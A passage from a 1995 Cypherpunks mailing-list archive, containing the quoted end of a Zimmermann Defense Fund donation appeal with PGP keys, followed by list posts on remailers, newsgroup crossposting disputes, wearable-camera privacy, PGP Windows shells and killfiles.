> micro and mainframe environments.  We know that Phil and the PGP
> development team successfully negotiated a commercial license with
> Viacrypt, and, through the efforts of MIT, a noncommercial license for
> PGP with RSA Data Security, the holders of the patent on the RSA
> algorithm on which PGP is based, thus freeing the program from the
> shadow of allegations of patent infringement.  We know that programs
> such as PGP represent one of our best bulwarks in the Information Age
> against the intrusions of public and private information gatherers.  We
> know that PGP is a key tool in insuring that the "Information
> Superhighway" will open the world to us, without opening us to the
> world.
> 
>     What we may not all know is the price Phil has had to pay for his
> courage and willingness to challenge the crypto status quo.  For years
> now Phil has been the point man in the ongoing campaign for freely
> available effective cryptography for the everyday computer user.  The
> costs, personal and professional, to him have been great.  He wrote the
> original code for PGP 1.0 by sacrificing months of valuable time from
> his consulting career and exhausting his savings.  He continues to
> devote large amounts of his time to testifying before Congress, doing
> public speaking engagements around the world, and agitating for
> "cryptography for the masses," largely at his own expense.  He is now
> working, still for free, on the next step in PGP technology, PGP Phone,
> which will turn every PC with a sound card and a modem into a secure
> telephone.  And we know that, just last month, he was searched and
> interrogated in the absence of counsel by US Customs officials upon his
> return from a speaking tour in Europe.
> 
>     Phil's legal team consists of his lead counsel, Philip Dubois of
> Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in
> Washington, DC, first counsel for intelligence policy for the Justice
> Department under President Carter; Eben Moglen, professor of law at
> Columbia and Harvard Universities; Curt Karnow, a former assistant US
> attorney and intellectual property law specialist at Landels, Ripley &
> Diamond in San Francisco; and Thomas Nolan, noted criminal defense
> attorney in Menlo Park.
> 
>     While this is a stellar legal team, what makes it even more
> extraordinary is that several of its members have given their time for
> free to Phil's case.  Still, while their time has been donated so far,
> other expenses -- travel, lodging, telephone, and other costs -- have
> fallen to Phil.  If the indictment is handed down, time and costs will
> soar, and the members of the team currently working pro bono may no
> longer be able to.  Justice does not come cheap in this country, but
> Phil deserves the best justice money can buy him.
> 
>     This is where you and I come in.  Phil Dubois estimates that the
> costs of the case, leaving aside the lawyers' fees, will run from
> US$100,000 - $150,000.  If Phil's team must charge for their services,
> the total cost of the litigation may range as high as US$300,000.  The
> legal defense fund is already several thousand dollars in the red and
> the airline tickets to San Jose haven't even been purchased yet.
> 
>     In September, 1993 I wrote a letter urging us all to support Phil,
> shortly after the first subpoenas were issued by Customs.  Today the
> need is greater than ever, and I'm repeating the call.
> 
>     Phil has assumed the burden and risk of being the first to develop
> truly effective tools with which we all might secure our communications
> against prying eyes, in a political environment increasingly hostile to
> such an idea -- an environment in which Clipper chips and digital
> telephony bills are our own government's answer to our concerns.  Now
> is the time for us all to step forward and help shoulder that burden
> with him.
> 
>     It is time more than ever.  I call on all of us, both here in the
> US and abroad, to help defend Phil and perhaps establish a
> groundbreaking legal precedent.  PGP now has an installed base of
> hundreds of thousands of users.  PGP works.  It must -- no other
> "crypto" package, of the hundreds available on the Internet and BBS's
> worldwide, has ever been subjected to the governmental attention PGP
> has.  How much is PGP worth to you?  How much is the complete security
> of your thoughts, writings, ideas, communications, your life's work,
> worth to you?  The price of a retail application package?i  Send it.
> More?  Send it.  Whatever you can spare: send it.
> 
>     A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has
> been established with Phil Dubois in Boulder.  Donations will be
> accepted in any reliable form, check, money order, or wire transfer,
> and in any currency, as well as by credit card.
> 
>     You may give anonymously or not, but PLEASE - give generously.  If
> you admire PGP, what it was intended to do and the ideals which
> animated its creation, express your support with a contribution to this
> fund.
> 
>                            *    *    *
> 
>     Here are the details:
> 
>     To send a check or money order by mail, make it payable, NOT to Phil
> Zimmermann, but to "Philip L. Dubois, Attorney Trust Account."  Mail the
> check or money order to the following address:
> 
>     Philip Dubois
>     2305 Broadway
>     Boulder, CO USA 80304
>     (Phone #: 303-444-3885)
> 
>     To send a wire transfer, your bank will need the following
> information:
> 
>     Bank: VectraBank
>     Routing #: 107004365
>     Account #: 0113830
>     Account Name: "Philip L. Dubois, Attorney Trust Account"
> 
>     Now here's the neat bit.  You can make a donation to the PZDF by
> Internet mail on your VISA or MasterCard.  Worried about snoopers
> intercepting your e-mail?  Don't worry -- use PGP.
> 
>     Simply compose a message in plain ASCII text giving the following:
> the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank
> name of your VISA or MasterCard; the name which appears on it; a tele-
> phone number at which you can be reached in case of problems; the card
> number; date of expiry; and, most important, the amount you wish to do-
> nate.  (Make this last item as large as possible.) Then use PGP to en-
> crypt and ASCII-armor the message using Phil Dubois's public key, en-
> closed below.  (You can also sign the message if you like.)  E-mail
> the output file to Phil Dubois (dubois@csn.org). Please be sure to use
> a "Subject:" line reading something like "Phil Zimmermann Defense Fund"
> so he'll know to decrypt it right away.
> 
> 	Bona fides: My relation to Phil Z. is that of a long-time user and
> advocate of PGP and a personal friend. For over a year I moderated the
> (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site
> here at Loyola. I am in no way involved with the administration of the
> PZDF. I volunteer my time on its behalf.
> 	Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case.
> He administers the PZDF.
> 	To obtain a copy of my public key (with which you can verify the
> signature on this doc), you have a number of options:
> 	- Use the copy which I will append below.
> 	- Send mail to me at hmiller@luc.edu with the "Subject:" line
> reading "send pubkey"
> 	- Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm
> 	- Obtain it from an Internet PGP keyserver machine such as
> pgp-public-keys@pgp.ai.mit.edu. Just send a mail message to this
> address with the "Subject:" field "GET hmiller". Other keyserver
> machines on the Net which accept the same message format (and
> automatically synchronize keyrings with each other every 10 minutes or
> so) include:
> 
> 		pgp-public-keys@pgp.mit.edu
> 		pgp-public-keys@demon.co.uk
> 		pgp-public-keys@pgp.ox.ac.uk
> 		pgp-public-keys@ext221.sra.co.jp
> 		pgp-public-keys@kub.nl
> 		pgp-public-keys@pgp.iastate.edu
> 		pgp-public-keys@dsi.unimi.it
> 		pgp-public-keys@pgp.dhp.com
> 
> 	You can verify my public key by calling me at 312-338-2689 (home)
> or 312-508-2727 (office) and letting me read you my key fingerprint
> ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring).
> I include it also in my .sig, below, if that's good enough for you.
> 	You might also note that Phil Zimmermann has signed my public key.
> Hopefully he is Node #1 in your Web-of-Trust! His key is available on
> the net keyservers and in the 'keys.asc' file in the PGP distribution
> packages.
> 	Phil Dubois's pubkey can also be obtained from the keyservers, if
> you prefer that source to the text below, and from 'keys.asc'. Phil Z.
> has signed his key as well.
> 
>     Here is Phil Dubois's public key:
> 
> - -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.7
> 
> mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8
> 5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR
> rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR
> tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE
> uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF
> i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN
> dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw==
> =5uit
> - -----END PGP PUBLIC KEY BLOCK-----
> 
> Here is my (Hugh Miller's) public key:
> 
> - -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy7frrEAAAEEALzOAQt+eWHzXSDLRgJaQMQ7Uju1xrD9mXAZGAG1GmiTNjKl
> wK68qOXrwJvnH1BmGtg8GGv53nTeabltpn5crsQVFm+0623M56/T7SOeUBWxxoa0
> vvqAA8sJ6ac1/MXY9KIgqxu8Mu6Qwf68C4OnwCbE7T71bi+fjdEdYC5Hk8UpAAUR
> tB1IdWdoIE1pbGxlciA8aG1pbGxlckBsdWMuZWR1PokAlQMFEC7ryVNleYS4x6lm
> 3QEBW6YD/2IOIZX9FOggNyemvPwM/EN86KW74ZGuYuTIfPCrvOMy8pFqfE33Bw93
> UkyIDj1Yh/nDlclEOO/J0tyngPn2BD2vMtaKIGRhVjnoxQc3BfzdjJ2nnHoFzAjz
> 0MBxYthysmWYsyF8cQxST6LZLITKkf41dti8SVKYVRWIgkyub02HiQCVAwUQLt/F
> oNEdYC5Hk8UpAQHD1wP9GdN9OHAKkIRsHeHy0wsEkI4Emb/bHiU+W59Zw7NPWsWF
> 3WTT1z8GKNToQLUdysbbJuSSk3rD3F4SNGJ+KPjR4674pmEfCVVP8cQPXEl4a3Zs
> xSLWNI6rG3muUAfLdyZiFP08NthOVlP2h1aOLCqIgkjEYMfQNEgkefBRJd6JywI=
> =hWCA
> - -----END PGP PUBLIC KEY BLOCK-----
> 
>                            *    *    *
> 
>     This campaign letter will be posted in a number of Usenet groups.
> I will also be turning it into a FAQ-formatted document, which will be
> posted monthly in the relevant groups and which will be available by
> anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ.  If
> you come upon, or up with, any other ways in which we can help raise funds
> for Phil, drop me a line at hmiller@luc.edu and let me know, so that I
> can put it in the FAQ.
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2
> pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX
> z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B
> Ah+LQNb01Xo=
> =aW2m
> -----END PGP SIGNATURE-----
> 
> 
> 
> --
> Hugh Miller, Ph.D.                                     Voice: 312-508-2727
> Asst. Professor of Philosophy                            FAX: 312-508-2292
> Loyola University Chicago                               Home: 312-338-2689
> 6525 N. Sheridan Rd.                               E-mail: hmiller@luc.edu
> Chicago, IL 60626                         WWW: http://www.luc.edu/~hmiller
> PGP Public Key 4793C529:  FC D2 08 BB 0C 6D CB C8  0B F9 BA 55 62 19 40 21

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM


                 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 00:15:04 PST
To: Cypherpunks@toad.com
Subject: The first reply came 3 days later.
Message-ID: <Pine.3.89.9501070243.B14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



These groups are important to me. It is why I posted them there. I use

PGP extensively in my usenet postings, and I am not the only one in those

groups that posts with PGP. Yes, suffice to say, I endorse this letter.

I dream of a day when we do not have to deal with this issue, yet it is

something that affects any one who uses the program. All that was really

asked was not to go to the meeting with the D.A., and make a protest.

MOST CYPHERPUNKS I KNOW OF COULDN'T HAVE MADE IT ANYWAY, THIS TIME, BECAUSE

THE STAKES IN THE REMAILER GAME ARE HIGH, AND WITHIN A MONTH OR TWO, THERE

WILL BE SYSTEM SO THAT WE CAN GET SOME MONEY TO EAT WITH AND BUY EQUIPMENT.

But on the user level, I do my best to TEACH GOOD FUNDAMENTAL COMPUTER

SAFETY. Rumors are no good for this. There was PRZ's letter to us, and

Dubois's letter to alt.security pgp. Those are facts. Those I can teach

with, and so can even a one month PGP Cypherpunk Novice. So can you.

Now, the first reply,




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Fri, 6 Jan 95 17:26:41 PST
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199501062336.PAA12592@homer.spry.com>
Message-ID: <199501070127.AA00746@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



> Think I'll go make some popcorn and sit back to watch the fireworks some more.

(giggle) (giggle) 
(giggle) (giggle) 

Me, too. 

Love always,

Carole Anne Buttock

P.S. Someone with a clue: please help me get a life. Only 10
     cross posts!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Fri, 6 Jan 95 23:55:20 PST
To: cypherpunks@toad.com
Subject: what to do about live video - all the time?
Message-ID: <199501070745.CAA64839@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've just invented a big hassle, and if I don't start the patent 
process someone else will.

Picture a near future in which your shirt or walkman is a 360 degree video 
camera sensing live video across visible and other spectra.  Your shirt
sends out a signal to your home computer, Your home computer archives your
daily environment and activities for you.

You have been sold this device on several premises.

	1) crime reduction - no sane low level criminal would harass
	   you; you have him, his biometrics, unique thermal signature
	   etc. on video.  Talk about neighborhood watch.

	2) life/work productivity enhancement.  What was said when?
	   what could you have looked into today but slipped your mind?

	3) warm fuzzies.  Kodak style "your life in pictures."


For now I'll assume the device actually works as claimed.  It is 
affordably priced.  Any normal person who has a car alarm, walkman,
or laptop PC is apt to have one.  You even get a small discount on your
health insurance.  Maybe your local taxes go down as your district
votes to reduce the # of cops.

For now, we assume that all the output of your video shirt
is securely encrypted when it leaves the Vshirt.

	
	ISSUE 1:  Who controls the data?

Year 0:  The devices are so rare the police don't think to ask
	 people to supply their tapes if they witness a crime 
	 committed re: a third party.  

Year 3:	 The police subpeona Vshirts they know to be in the
	 crime vicinity.  Presumably they use their current
	 abilities with cellphone companies to locate who's where when.

Year 3.1 While reviewing Vshirt tapes police note that non-case
	 related illegal activities are going on.  Jaywalking.
	 Speeding.  Recreational drugs.  Verbal assault. Life and
	 property threatening felonies are also discovered.

At this point the scene bifurcates wildly:  Do the police say,
"look, this is happening anyway, we need 24 hour video surveillance
of everything - if nothing else to protect ourselves in court."

	Evidence: in the UK they video the motorways, and several
	public areas in the cities (soc.culture.british Jan '95)
	-for crime/security purposes.

	In the US, there are utility poles wired for sound. Design News
	had an item on this in their Yellow newsflash section in '93
	I think.  The utility poles were/are in washington DC, and 
	supposedly only listen for gunshots.  I'm pretty sure the poles 
	could call the cops in using triangulated crime location data too.

However slight the infraction, we are all lawbreakers.  Do we have a 
right to 'not testify against ourselves" by refusing to decrypt?  Can we 
buy (ugh.) an "attorney-client privlege" box that hold all of our data Keys
in a legal fiction that the courts currently respect?  Will the 5th fare 
any better than the 1st and second amendments?

Will the state issue a "statute of limitations" on data-recorded
crime, so that you can't be arrested for last year's public drunkenness?

Will Vshirt makers make, or be allowed to make, devices that create
-absolutely no residue- data keys?  that way, if you want to
protect yourself from what you happened last thursday you can set the
keystrip on fire and nobody, not even you, has a hope of ever decrypting?

	Evidence: in the US Digital audio tape Mfrs. are required to
	put in some sort of copyguard. Also scanners w/image signature.

	In the US, reconstructed deleted files for legal purposes is
	considered legal evidence.  There is a firm in Seattle that
	has even reconstructed harddisks written over with 0s
	for criminal (tax) cases.
	
	Citizens or their employers are required to keep and prepare 
	documentation adequate to prepare a valid tax return. i.e., 
	some records you _have_ to keep.

	and of course the digital telephony bill... 
	

What thoughtful Pro-freedom arguments can be constructed to deal with 
this device and its social fallout?  What thoughtful software and hardware
can be created?

The device does not yet exist, but component parts can be assembled for
less than $2000 and 17oz weight that do a fair job of mimicking it.

	Moore's "law" suggests that by 2000, these oughta be
	$19.99/month plus data charges.

VoicePGP is a great jumping-off place...will there be a VideoPGP,
or rather an optimized-for-videoPGP coming soon?  If I've
christened its existence now.  I hereby declare the application of 
Public+private key cryptography as it especially applies to picture, live 
picture, and/or video transmission to be public domain.   
(Surely I'm not the first, but this can't hurt.)

Write.  Talk.  Create.  Protect yourselves.


ObLameJoke:					   
Well, as far as I know none of my relatives were killed by Stalin, or Mao, 
or interned in WWII, or blacklisted, or even jailed.  I suppose a few 
were drafted.  I guess it's about time for the forces of authority to 
reach into my little corner of the gene pool and crush me too.  I mean, 
I'm missing out!  


Treon Verdery, posting under the auspices of Adam Almog




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 00:56:30 PST
To: Cypherpunks@toad.com
Subject: I haven't read this response, until now!
Message-ID: <Pine.3.89.9501070201.C14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear All,

I haven't seen the next two responses, yet they comprise all the 
responses that ten news groups had made as of this posting, in my
newsreader here at MM.COM. I am told there are now more, yet I think
it's kind of a moot point (david@winternet.com was the reporter).

So I am going to import the text now and read it finally.
I have read the text, and I giggle a little, at who sent it.

Now you already have had the advantage of seeing copy by Mr. Horwath.
Mr. Logajan didn't. And didn't for a number of days. Nor did anyone
anyone else either.
[teacher mode on]

LOOK AT THE GROUPS MR. LOGAJAN IS RESPONDING TO. HE IS ONLY REPLYING TO

ONE, NOT TEN GROUPS. AND, EITHER HE OR MR. HAS CENSORED NINE OTHER GROUPS

FROM THEIR RIGHTFUL REPLIES. I DO BELIEVE, WHEN YOU LOOK AT MR. HORWATH'S

PRIOR POSTING, I THINK YOU WILL FIND THAT HE DID TAMPER WITH THE POSTING.

AND, WHAT YOU GET AS A LESSON HERE IS JUST WHY THE REMAILER PROGRAM IS IN

TROUBLE. THERE JUST HAS TO BE PLAIN AND SIMPLE TRUST. MR. LOGAJAN IS UNDER

THAT SIMPLE DELUSION, FOR THE MOMENT. YET AS CYPHERPUNKS, THERE IS A KIND

OF AN UNSTATED UNDERSTANDING THAT WE DO NOT DO THIS TO OTHERS OR OURSELVES.

[teacher mode off]

Mr. Horwath at least owes Mr. Logajan an apology. For misrepresentation.

Mr. Horwath owes nine newsgroups an apology. For telling them (through 
ommission) that mn.general is more important than they are. 
It was about this point I was on the list again. 
The damage was done, and now repairs were under way. 

Now, the third and last response I know of, to this point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:12:51 PST
To: RopeGun@calvino.alaska.net
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107014244.RopeGun@RopeGun.alaska.net>
Message-ID: <m0rQY9E-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion 
> that a shell for pgp is the most sensible approach using such a powerfull encryption program.  I've 
> searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to 
> assume that the user has an above average understanding of the workings of pgp and all of its uses.  At 
> this point your probably thinking that I'm looking for an easy way to get around learning pgp the hard way, 
> but I'm not...   the whole idea of pgp is that privacy and security be available to anyone, using any platform. 
>  But ease of use was not really one of the features built into pgp.  If anyone can refer me to a windows 
> shell for pgp (for dummys :-)   ) I would like to get a copy of it for distribution on the bullitin board nets...

Which ones have you looked at?
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:32:20 PST
To: RopeGun@calvino.alaska.net
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
Message-ID: <m0rQYRy-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> winpgp2.6 was the most succesfull pgp shell I could find but the interface
> was stale and non descript.  including the fact that when it executed the
> commands it opened a window and I was interfacing with the dos pgp
> interface, I found that a little redundant for a shell program; but then
> again I'm not sure if an interface with pgp can be done any other way. 

Try ftp.netcom.com:/pub/ec/ecarp/pgpwind.zip - you might find it a bit more
to your liking.  There are others out there, and their authors will probably
speak up :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sat, 7 Jan 95 03:36:04 PST
To: tengi@Princeton.EDU (Christopher J. Tengi)
Subject: Re: Indexing and searching
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <199501071134.DAA17942@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    We sure need some indexing and searching to use the archive.
    A directory command at ftp.hks.net:/cypherpunks/nntp/cypherpunks 
    get you 8200+ lines of:
    ...
    -rw-r--r--  1 8        8           34609 Sep 24 20:02 3255
    -rw-r--r--  1 8        8            1154 Sep 24 20:24 3256
    -rw-r--r--  1 8        8            1443 Sep 25 03:15 3257
    -rw-r--r--  1 8        8            1675 Sep 25 03:33 3258
    -rw-r--r--  1 8        8            1634 Sep 25 10:35 3259
    -rw-r--r--  1 8        8            3243 Jul 21 23:59 326
    -rw-r--r--  1 8        8             955 Sep 25 11:41 3260
    -rw-r--r--  1 8        8            2088 Sep 25 12:05 3261
    -rw-r--r--  1 8        8            3930 Sep 25 12:06 3262
    ...

    Why its virtually encrypted!  How fitting.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Sat, 7 Jan 95 01:42:30 PST
To: Cypherpunks@toad.com
Subject: Nope, the Skypoint Newsreader didn't carry any of the 9 groups.
Message-ID: <Pine.3.89.9501070359.D14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

And, amazingly neither does MM.Com. And if I'm going to infer, I'd better go
back and look at the facts on hand. No, Mr. Horwath's reader has up to
4,500 or so groups in it at any given moment. Here at MM.Com we only have
1,009 to be precise. So let us remind ourselves that this didn't even get
"full" coverage in a lot of places. And, in some maybe none at all.

So stay tuned, as the story of the anonymous remailer cartel works it's
way into place. I have a chain.exe script in the winternet.files. Spose
I could go net.rad and go get another from soda.berkeley or somewhere.
Look remailers, meet somehwere face to face, shake hands, hug each other,
cut a deal eyeball to eyeball, just do the best you can with what you've got.

So remailer cartel 1.0 has a bug or two. So does all humanity. Even so did
my logic for a minute or two (only). So go somewhere fun and sort it out.
And write what wonderful "vacations" you having, as you all will be MAKING
MONEY FAST, within hours after your glorious return to civilization.

(even money says the anon server bounces this to somebody)

And as I stated four postings ago.

No Mr. Ste. Marie only ten, and as we saw in some cases only one.
not hundreds or thousands, just a few. .1% One One Tenth of a Percent.
And, one instance of One One Hundreth of a Percent. About as bad as
the pentium bug story. And that's still an acceptable post in any group.

Somebody uses PGP in any of those groups. They are my friends.
I hope I can learn remailer procedure and code soon, it looks fun.

Thanks for your time.

Love Always,

Carol Anne




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 03:27:52 PST
To: "I'm Wozz" <wozzeck@phantom.com>
Subject: Big vs Little providers (punkette view)
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <Pine.3.89.9501070420.H14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Perspective, Perspective, Perspective.

You're both right on many counts.

Mike is a "fine benevolent dictator". He has many "happy" users.
He has now five local Usenet groups of winternet.*

But he reneges on deals. The shirts were ready before Thanksgiving.
He posseses them as I write. He violates the spirit by which
I processed their making (the samples).

Many orders for the shirts were made prior to Thanksgiving, I still have the
mail for them at squeaky.free.org (good storage place).

Then there's the GT story. I organized one for them. Created a sked for 
more of them. He didn't like the sked. The Users did.

There was an incident of much greater magnitude, that drew far less
attention. It was my call for WWW crosspost linkages. It was hand
posted to 75 or so groups, one at a time. The plus minus ratio of
mail was last at 412 positive, and 8 negative. Squeaky has half the
mail. There's 50 and growing crossposts that are drawing 200+ 
accesses a day to that page. Any other page he has on his system 
is only drawing 40-50 responses at best. I have copies of the
daily access statistics /usr/local/ect/httpd/stats/summary

If my mail is frozen, so to should all phases of that account, including
the WWW Pages. Besides maybe they"have violated acceptable use policy",too!
That's just sound administrative policy to shut everything down.

You haven't heard about Webbittown, yet. Bruce Sterling owns #9 Blackice 
Blvd. It's a Web page city of 20,000 individual pages, at a $1,000 a page.
Just like Real Estate. Run by doom software drivers.

Mike's poor vision is another T1 line, maybe two if he's lucky.
They are hacking his machine like crazy, he claims.
That means you got some serious enemies, if it's true.
That means you don't abuse your fans like me, at a time like that.
It also probably means one of his "friends" is his enemy.

I have an alt.dream.lucid of having the world's best web server.
I dream of people being able to protect their HTML code with PGP.
Funtional on top, crypto underneath. Encryption on the fly.

This was something that was bound to happen sooner or later.
Better sooner than later. Now there's precedent. 10 groups,
and the reply's caught in the pine processor 3.91,too!

Doc Ozone says pine 3.91's full of leaks. Doc Ozone and I make 
machines for people who are 'netless'. It's called the tired,
poor project. Give us your tired, your poor, your old PC's.

Miles, a seven year old is next on the list. We gave Mike a 
Sparc monitor from one of our equipment forrays. Free,zip, zilch
for we got for free zip zilch. He begged for it. It was still
sitting in the office wednesday, unfixed for anyone.

I equate the thing to a domestic abuse situation. As long as it's
minor, as long as it's hushed, it's OK Even this would have been
OK if had stayed silent. There is a safety in numbers factor.
AOL proves it. And as they descend upon the the net things will
change again.

The moment I called little tiny Micro Net, I knew there would be
fallout. I will not respond to the actual posting unless I'm asked
a direct question about the substance of the post. But it's
pretty self explanitory, and I cry to think there's a real bitch.

Yes, at Netcom, I can now probably get much further, much faster.
No I wouldn't subject myself or anyone to Winternet. But I wouldn't
subject a newbie to Netcom either. I did it once and was sorry, too.

I'm just a punk girl who writes great HTML code. And I hope that
it can be protected by cryptograhy, that's my little goal.

I hope I have both made you think and feel you are right,
because both of you are, in certain kinds of ways. And you know it, too.

Now where was I?, oh yeah, Is there like a Remailer for Dummies,
quick reference manual? I could have fun learning & doing that.

Till My Next Mini-Rant,

Love Always,

Carol Anne



Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 04:40:49 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Files and mail
In-Reply-To: <199501070607.BAA04310@bb.hks.net>
Message-ID: <Pine.3.89.9501070624.J14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


You should paint this as a canvas,and sell it for five big digits.
This post right here, in all its mono glory, is real art.

On Sat, 7 Jan 1995, L. Todd Masco wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Anybody want to offer odds on whether or not this merry little exchange
> will be reported in Wired as news?
> - - --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
> - - --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
> 
> - -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk
> kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws
> qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit
> dA1go4Jiaag=
> =eQPF
> - -----END PGP SIGNATURE-----
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ
> Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA
> =g1Bd
> -----END PGP SIGNATURE-----
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Sat, 7 Jan 95 04:52:46 PST
To: cypherpunks@toad.com
Subject: Killfiles 101
Message-ID: <Pine.3.89.9501070625.I14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



1. The best and only way you can be sure you're 
   killing a file is to turn your machine off.
   Only then can you be sure it is dead.

2. If you must resort to using killfiles,
   (great marketer trick, make you use it 
   again and again, and again, like a gun)
   kill "classes" of files, as opposed to
   individuals, you'll get better kill ratio.
   A good example is anon or wizvax users.

3. Note: Killfiles are a censor's best friend!
   And you'll become what you swore you wouldn't.

does your signature tell the truth nesta? Can't know everything 
with a killfile! Eventually you'll kill the file that'd get you sex.


Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <cyber1@io.org>
Date: Sat, 7 Jan 95 03:59:40 PST
To: cypherpunks@toad.com
